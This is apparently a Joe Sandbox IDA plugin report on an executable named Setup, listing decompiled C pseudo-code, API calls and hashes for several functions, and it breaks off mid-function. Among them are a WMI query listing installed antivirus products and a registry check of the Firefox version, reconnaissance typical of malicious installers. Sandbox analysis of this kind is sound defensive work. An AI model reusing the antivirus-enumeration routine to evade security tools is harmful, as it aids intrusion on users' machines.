                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path$Backslash$FolderInformationVolume__vswprintf__wsplitpath__wsplitpath_helper_memset_sprintf_strlen
                                                                                                                                                              • String ID: %.8x
                                                                                                                                                              • API String ID: 2556234588-3443174927
                                                                                                                                                              • Opcode ID: 81bd3fde9b9030f1fd4124bdefac55089ac51d23cde60f687ef94aade1a2b8bb
                                                                                                                                                              • Instruction ID: 7867479c3adea28f3d0d62ba70a56522cd4e3f6b322498506d0fd7f1f505525c
                                                                                                                                                              • Opcode Fuzzy Hash: 81bd3fde9b9030f1fd4124bdefac55089ac51d23cde60f687ef94aade1a2b8bb
                                                                                                                                                              • Instruction Fuzzy Hash: 7B518DB1E00218AFDB14EF94DC52FEEB778AF45304F40859AF509A7281EB746A44CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E004D5A80(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				struct HICON__* _v56;
                                                                                                                                                              				char _v84;
                                                                                                                                                              				long _v88;
                                                                                                                                                              				int _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                              				signed int _t34;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				signed char _t43;
                                                                                                                                                              				WCHAR* _t54;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				void* _t78;
                                                                                                                                                              				signed int _t79;
                                                                                                                                                              
                                                                                                                                                              				_t78 = __esi;
                                                                                                                                                              				_t77 = __edi;
                                                                                                                                                              				_t57 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x506d9c);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t34 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t35 = _t34 ^ _t79;
                                                                                                                                                              				_v20 = _t35;
                                                                                                                                                              				_push(_t35);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v56 = 0;
                                                                                                                                                              				if(0x5bdf4c == 0) {
                                                                                                                                                              					_v92 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v92 = 0x5bdf50;
                                                                                                                                                              				}
                                                                                                                                                              				_v96 = E004098D0( &_v84, _v92, L"setup.ico");
                                                                                                                                                              				_v100 = _v96;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E00409810(_v100);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004178C0( &_v84);
                                                                                                                                                              				_t43 = E0049E7E0( &_v52, 0); // executed
                                                                                                                                                              				if((_t43 & 0x000000ff) != 0) {
                                                                                                                                                              					_t54 = E00416A30( &_v48);
                                                                                                                                                              					_v56 = LoadImageW(E00429A60(0x5c1a9c), _t54, 1, 0, 0, 0x50);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v56 == 0) {
                                                                                                                                                              					_v56 = LoadIconW(E00429A60(0x5c1a9c), 1);
                                                                                                                                                              				}
                                                                                                                                                              				_t76 = _a4;
                                                                                                                                                              				if(IsWindow(_a4) != 0) {
                                                                                                                                                              					SendMessageW(_a4, 0x80, 1, _v56); // executed
                                                                                                                                                              					_t76 = _v56;
                                                                                                                                                              					SendMessageW(_a4, 0x80, 0, _v56); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_v88 = _v56;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v88, _t57, _v20 ^ _t79, _t76, _t77, _t78);
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • LoadImageW.USER32 ref: 004D5B3A
                                                                                                                                                              • LoadIconW.USER32(00000000,00000001), ref: 004D5B56
                                                                                                                                                              • IsWindow.USER32(004CD3AA), ref: 004D5B63
                                                                                                                                                              • SendMessageW.USER32(004CD3AA,00000080,00000001,00000000), ref: 004D5B7C
                                                                                                                                                              • SendMessageW.USER32(004CD3AA,00000080,00000000,00000000), ref: 004D5B91
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LoadMessageSend$IconImageWindow
                                                                                                                                                              • String ID: setup.ico
                                                                                                                                                              • API String ID: 2942324917-2566955499
                                                                                                                                                              • Opcode ID: 2e6fabcc37fb763c98c8a89be4989083d70297befae0955a0de263be4558a70f
                                                                                                                                                              • Instruction ID: 2bd365032c2f552ced306848ea20a241a52543378c904a779762d3456a8b84a7
                                                                                                                                                              • Opcode Fuzzy Hash: 2e6fabcc37fb763c98c8a89be4989083d70297befae0955a0de263be4558a70f
                                                                                                                                                              • Instruction Fuzzy Hash: 02414D75A01248ABDB04DFE4DC55BEEBBB9BB48704F10852EF502AB381DB746904CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E00484EA0(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				signed int _t20;
                                                                                                                                                              				signed int _t21;
                                                                                                                                                              				signed int _t23;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				char _t30;
                                                                                                                                                              				signed char _t35;
                                                                                                                                                              				signed int _t47;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              
                                                                                                                                                              				_t53 = __esi;
                                                                                                                                                              				_t52 = __edi;
                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50cca6);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t20 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t21 = _t20 ^ _t54;
                                                                                                                                                              				_v32 = _t21;
                                                                                                                                                              				_push(_t21);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_t23 =  *0x5c2b0c; // 0x1
                                                                                                                                                              				if((_t23 & 0x00000001) == 0) {
                                                                                                                                                              					_t47 =  *0x5c2b0c; // 0x1
                                                                                                                                                              					 *0x5c2b0c = _t47 | 0x00000001;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t35 = E00484B40(__ebx, __edi, __esi); // executed
                                                                                                                                                              					asm("sbb edx, edx");
                                                                                                                                                              					_t49 =  ~( ~(_t35 & 0x000000ff));
                                                                                                                                                              					 *0x5c2b08 =  ~( ~(_t35 & 0x000000ff));
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              				}
                                                                                                                                                              				if( *0x5c2b08 <= 1) {
                                                                                                                                                              					E00434E30( &_v24);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					_t28 = E0041EEA0( &_v24, 0x80000002, L"SOFTWARE\\Mozilla\\Mozilla Firefox", 1); // executed
                                                                                                                                                              					if(_t28 == 0) {
                                                                                                                                                              						_t30 = "0"; // 0x30
                                                                                                                                                              						_v96 = _t30;
                                                                                                                                                              						E00451D90(_t52,  &_v92, 0, 0x3c);
                                                                                                                                                              						_v28 = 0x20;
                                                                                                                                                              						_t49 =  &_v28;
                                                                                                                                                              						E0041EDE0( &_v24, L"CurrentVersion",  &_v96,  &_v28);
                                                                                                                                                              						 *0x5c2b08 = E00451CBD( &_v96, 0, 0xa);
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041EF60( &_v24);
                                                                                                                                                              				}
                                                                                                                                                              				_t25 =  *0x5c2b08; // 0x0
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t25, _t36, _v32 ^ _t54, _t49, _t52, _t53);
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::___wcstoi64_memsetstd::_
                                                                                                                                                              • String ID: $CurrentVersion$SOFTWARE\Mozilla\Mozilla Firefox
                                                                                                                                                              • API String ID: 3485345583-1023798336
                                                                                                                                                              • Opcode ID: 61034f3484858b031ddec6510427f16abae38c00ff857c6c04db67119d5ca015
                                                                                                                                                              • Instruction ID: 5e62964c8161c01d3a93b7efa467fe588d9bb2ef01a0888bc2b9f6aa12e67c5a
                                                                                                                                                              • Opcode Fuzzy Hash: 61034f3484858b031ddec6510427f16abae38c00ff857c6c04db67119d5ca015
                                                                                                                                                              • Instruction Fuzzy Hash: AA21D0B09006099FDB14DF95D842FAEB7B4FB54714F00821EF911AB2D1EB382E08CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00451FC6(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                                                                              				DWORD* _v8;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				DWORD* _t25;
                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                              				char _t41;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              
                                                                                                                                                              				_t41 = _a12;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t48 = _t41;
                                                                                                                                                              				if(_t41 != 0) {
                                                                                                                                                              					_push(__esi);
                                                                                                                                                              					E00457212();
                                                                                                                                                              					_t44 = E00457789(1, 0x214);
                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						L7:
                                                                                                                                                              						_push(_t44);
                                                                                                                                                              						E0044FAFC(0, _t41, _t44, __eflags);
                                                                                                                                                              						__eflags = _v8;
                                                                                                                                                              						if(_v8 != 0) {
                                                                                                                                                              							E0045449D(_v8);
                                                                                                                                                              						}
                                                                                                                                                              						_t20 = 0;
                                                                                                                                                              						__eflags = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_push( *((intOrPtr*)(E00457400(0, __edx, _t41, __eflags) + 0x6c)));
                                                                                                                                                              						_push(_t44);
                                                                                                                                                              						E004572A0(0, _t41, _t44, __eflags);
                                                                                                                                                              						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
                                                                                                                                                              						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
                                                                                                                                                              						_t25 = _a24;
                                                                                                                                                              						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
                                                                                                                                                              						__eflags = _t25;
                                                                                                                                                              						if(_t25 == 0) {
                                                                                                                                                              							_t25 =  &_a12;
                                                                                                                                                              						}
                                                                                                                                                              						_t20 = CreateThread(_a4, _a8, E00451F43, _t44, _a20, _t25); // executed
                                                                                                                                                              						__eflags = _t20;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							_v8 = GetLastError();
                                                                                                                                                              							goto L7;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t27 = E00454477(_t48);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					 *_t27 = 0x16;
                                                                                                                                                              					E004557A5(__edx, _t41, __esi);
                                                                                                                                                              					_t20 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				return _t20;
                                                                                                                                                              			}













                                                                                                                                                              APIs
                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00451FF7
                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00452003
                                                                                                                                                              • __getptd.LIBCMT ref: 00452010
                                                                                                                                                              • __initptd.LIBCMT ref: 00452019
                                                                                                                                                              • CreateThread.KERNEL32 ref: 00452047
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00452051
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00452069
                                                                                                                                                                • Part of subcall function 00454477: __getptd_noexit.LIBCMT ref: 00454477
                                                                                                                                                                • Part of subcall function 004557A5: __decode_pointer.LIBCMT ref: 004557B0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3358092440-0
                                                                                                                                                              • Opcode ID: 26d222637614caea9229c71ed777be5846206efd60edda216f56c581922281af
                                                                                                                                                              • Instruction ID: c78e5e2b538e6bd289abf04ab91bbdd9a97470878333c0d25e63948099598028
                                                                                                                                                              • Opcode Fuzzy Hash: 26d222637614caea9229c71ed777be5846206efd60edda216f56c581922281af
                                                                                                                                                              • Instruction Fuzzy Hash: 11110872504205AFDB10BFA5EC4199F77E4EF05329B10403FFD00961A3EBB89D49DA68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E004956B0(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				signed int _v56;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				signed int _v68;
                                                                                                                                                              				char _v72;
                                                                                                                                                              				char _v76;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				intOrPtr _v88;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				char _v97;
                                                                                                                                                              				char _v104;
                                                                                                                                                              				char _v108;
                                                                                                                                                              				signed int _v112;
                                                                                                                                                              				char* _v116;
                                                                                                                                                              				signed int* _v120;
                                                                                                                                                              				signed int _v124;
                                                                                                                                                              				intOrPtr _v128;
                                                                                                                                                              				intOrPtr _v132;
                                                                                                                                                              				intOrPtr _v136;
                                                                                                                                                              				intOrPtr _v140;
                                                                                                                                                              				intOrPtr* _v144;
                                                                                                                                                              				intOrPtr* _v148;
                                                                                                                                                              				signed int _t132;
                                                                                                                                                              				signed int _t133;
                                                                                                                                                              				signed int _t138;
                                                                                                                                                              				signed char _t148;
                                                                                                                                                              				signed int _t155;
                                                                                                                                                              				signed char _t159;
                                                                                                                                                              				signed int _t160;
                                                                                                                                                              				signed int _t170;
                                                                                                                                                              				signed char _t177;
                                                                                                                                                              				signed int _t188;
                                                                                                                                                              				signed char _t189;
                                                                                                                                                              				signed int _t194;
                                                                                                                                                              				signed char _t195;
                                                                                                                                                              				void* _t204;
                                                                                                                                                              				void* _t279;
                                                                                                                                                              				void* _t280;
                                                                                                                                                              				signed int _t281;
                                                                                                                                                              
                                                                                                                                                              				_t280 = __esi;
                                                                                                                                                              				_t279 = __edi;
                                                                                                                                                              				_t272 = __edx;
                                                                                                                                                              				_t204 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5068d3);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t132 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t133 = _t132 ^ _t281;
                                                                                                                                                              				_v20 = _t133;
                                                                                                                                                              				_push(_t133);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v112 = 0;
                                                                                                                                                              				E004175C0(E00434050( &_v97));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					E00414C90();
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					_t138 = E00434050( &_v60);
                                                                                                                                                              					__imp__CoCreateInstance(0x51d91c, 0, 1, 0x51d84c, _t138); // executed
                                                                                                                                                              					_v68 = _t138;
                                                                                                                                                              					if(_v68 < 0 || (E00431950( &_v60) & 0x000000ff) != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					E00414C90();
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					_t148 = E00494F20(__eflags);
                                                                                                                                                              					__eflags = _t148 & 0x000000ff;
                                                                                                                                                              					if((_t148 & 0x000000ff) == 0) {
                                                                                                                                                              						_v116 = L"root\\SecurityCenter";
                                                                                                                                                              					} else {
                                                                                                                                                              						_v116 = L"root\\SecurityCenter2";
                                                                                                                                                              					}
                                                                                                                                                              					E00416A50( &_v72, _v116);
                                                                                                                                                              					_v8 = 4;
                                                                                                                                                              					_v120 = E0041D530( &_v60);
                                                                                                                                                              					_t272 =  *_v120;
                                                                                                                                                              					_t155 =  *((intOrPtr*)( *((intOrPtr*)( *_v120 + 0xc))))(_v120, E0041D530( &_v72), 0, 0, 0, 0, 0, 0, E00434050( &_v80)); // executed
                                                                                                                                                              					_v68 = _t155;
                                                                                                                                                              					__eflags = _v68;
                                                                                                                                                              					if(_v68 < 0) {
                                                                                                                                                              						L9:
                                                                                                                                                              						_v8 = 3;
                                                                                                                                                              						E00417300( &_v72);
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						E0040D320();
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E0040D320();
                                                                                                                                                              					} else {
                                                                                                                                                              						_t159 = E00431950( &_v80);
                                                                                                                                                              						__eflags = _t159 & 0x000000ff;
                                                                                                                                                              						if((_t159 & 0x000000ff) == 0) {
                                                                                                                                                              							_t160 = E0041D530( &_v80);
                                                                                                                                                              							__imp__CoSetProxyBlanket(_t160, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                                                              							_v68 = _t160;
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 >= 0) {
                                                                                                                                                              								E00414C90();
                                                                                                                                                              								_v8 = 5;
                                                                                                                                                              								_v124 = E0041D530( &_v80);
                                                                                                                                                              								_v128 = E00416A50( &_v104, L"SELECT * FROM AntivirusProduct");
                                                                                                                                                              								_v132 = _v128;
                                                                                                                                                              								_v8 = 6;
                                                                                                                                                              								_v136 = E00416A50( &_v108, L"WQL");
                                                                                                                                                              								_v140 = _v136;
                                                                                                                                                              								_v8 = 7;
                                                                                                                                                              								_t272 = _v124;
                                                                                                                                                              								_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_v124 + 0x50))))(_v124, E0041D530(_v140), E0041D530(_v132), 0x30, 0, E00434050( &_v64)); // executed
                                                                                                                                                              								_v68 = _t170;
                                                                                                                                                              								_v8 = 6;
                                                                                                                                                              								E00417300( &_v108);
                                                                                                                                                              								_v8 = 5;
                                                                                                                                                              								E00417300( &_v104);
                                                                                                                                                              								__eflags = _v68;
                                                                                                                                                              								if(_v68 < 0) {
                                                                                                                                                              									L14:
                                                                                                                                                              									_v8 = 4;
                                                                                                                                                              									E0040D320();
                                                                                                                                                              									_v8 = 3;
                                                                                                                                                              									E00417300( &_v72);
                                                                                                                                                              									_v8 = 2;
                                                                                                                                                              									E0040D320();
                                                                                                                                                              									_v8 = 1;
                                                                                                                                                              									E0040D320();
                                                                                                                                                              								} else {
                                                                                                                                                              									_t177 = E00431950( &_v64);
                                                                                                                                                              									_t272 = _t177 & 0x000000ff;
                                                                                                                                                              									__eflags = _t177 & 0x000000ff;
                                                                                                                                                              									if((_t177 & 0x000000ff) == 0) {
                                                                                                                                                              										E00414C90();
                                                                                                                                                              										_v8 = 8;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											__eflags = 1;
                                                                                                                                                              											if(1 == 0) {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											_v56 = 0;
                                                                                                                                                              											_v144 = E0041D530( &_v64);
                                                                                                                                                              											_t188 =  *((intOrPtr*)( *((intOrPtr*)( *_v144 + 0x10))))(_v144, 0xffffffff, 1, E00434050( &_v76),  &_v56); // executed
                                                                                                                                                              											_v68 = _t188;
                                                                                                                                                              											__eflags = _v68;
                                                                                                                                                              											if(_v68 < 0) {
                                                                                                                                                              												L20:
                                                                                                                                                              											} else {
                                                                                                                                                              												_t189 = E00431950( &_v76);
                                                                                                                                                              												__eflags = _t189 & 0x000000ff;
                                                                                                                                                              												if((_t189 & 0x000000ff) != 0) {
                                                                                                                                                              													goto L20;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eflags = _v56;
                                                                                                                                                              													if(_v56 != 0) {
                                                                                                                                                              														E00416A10( &_v96);
                                                                                                                                                              														_v8 = 9;
                                                                                                                                                              														_v148 = E0041D530( &_v76);
                                                                                                                                                              														_t194 =  *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x10))))(_v148, L"displayName", 0,  &_v96, 0, 0); // executed
                                                                                                                                                              														_v68 = _t194;
                                                                                                                                                              														_t195 = E00416630( &_v48);
                                                                                                                                                              														__eflags = _t195 & 0x000000ff;
                                                                                                                                                              														if((_t195 & 0x000000ff) == 0) {
                                                                                                                                                              															E004130D0( &_v48, ";");
														}
														E004130D0( &_v48, _v88);
														E00407680( &_v76);
														_v8 = 8;
														E00417430( &_v96);
														continue;
													} else {
														goto L20;
													}
												}
											}
											break;
										}
										_v8 = 5;
										E0040D320();
										_v8 = 4;
										E0040D320();
										_v8 = 3;
										E00417300( &_v72);
										_v8 = 2;
										E0040D320();
										_v8 = 1;
										E0040D320();
										_t272 = 0;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
										goto L14;
									}
								}
							} else {
								_v8 = 3;
								E00417300( &_v72);
								_v8 = 2;
								E0040D320();
								_v8 = 1;
								E0040D320();
							}
						} else {
							goto L9;
						}
					}
					L25:
					E00417660(_a4,  &_v52);
					_v112 = _v112 | 0x00000001;
					_v8 = 0;
					E004176E0();
					 *[fs:0x0] = _v16;
					return E0044F6C8(_a4, _t204, _v20 ^ _t281, _t272, _t279, _t280);
				}
				_v8 = 1;
				E0040D320();
				goto L25;
			}
                                                                                                                                                              0x00495835
                                                                                                                                                              0x0049583a
                                                                                                                                                              0x00495841
                                                                                                                                                              0x00495841
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004957d1
                                                                                                                                                              0x00495a6f
                                                                                                                                                              0x00495a76
                                                                                                                                                              0x00495a81
                                                                                                                                                              0x00495a84
                                                                                                                                                              0x00495a8b
                                                                                                                                                              0x00495a96
                                                                                                                                                              0x00495aab
                                                                                                                                                              0x00495aab
                                                                                                                                                              0x0049573b
                                                                                                                                                              0x00495742
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(0051D91C,00000000,00000001,0051D84C,00000000,00000000,DDD124F9), ref: 0049571D
                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00495813
                                                                                                                                                                • Part of subcall function 00417300: SysFreeString.OLEAUT32(?), ref: 0041730D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BlanketCreateFreeInstanceProxyString
                                                                                                                                                              • String ID: SELECT * FROM AntivirusProduct$WQL$displayName
                                                                                                                                                              • API String ID: 2425965127-1899659945
                                                                                                                                                              • Opcode ID: 93a75100d385984e2f38990b6fa03ec58190dc7e991788bc291b8f7b7eacd86c
                                                                                                                                                              • Instruction ID: a90a17872c16f0e7047f23e41f78ce943a9bde9899b374faa89ec17282e8318f
                                                                                                                                                              • Opcode Fuzzy Hash: 93a75100d385984e2f38990b6fa03ec58190dc7e991788bc291b8f7b7eacd86c
                                                                                                                                                              • Instruction Fuzzy Hash: 71C17F70D05248EEDF15EBA5D851BEDBBB0BF14308F60806EE412B71D2DB782A49CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00483370(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				intOrPtr _v34;
                                                                                                                                                              				intOrPtr _v38;
                                                                                                                                                              				intOrPtr _v42;
                                                                                                                                                              				intOrPtr _v46;
                                                                                                                                                              				intOrPtr _v50;
                                                                                                                                                              				intOrPtr _v54;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				signed int _v57;
                                                                                                                                                              				signed int _v64;
                                                                                                                                                              				signed int _v68;
                                                                                                                                                              				char _v69;
                                                                                                                                                              				char _v70;
                                                                                                                                                              				signed int _v76;
                                                                                                                                                              				intOrPtr _v80;
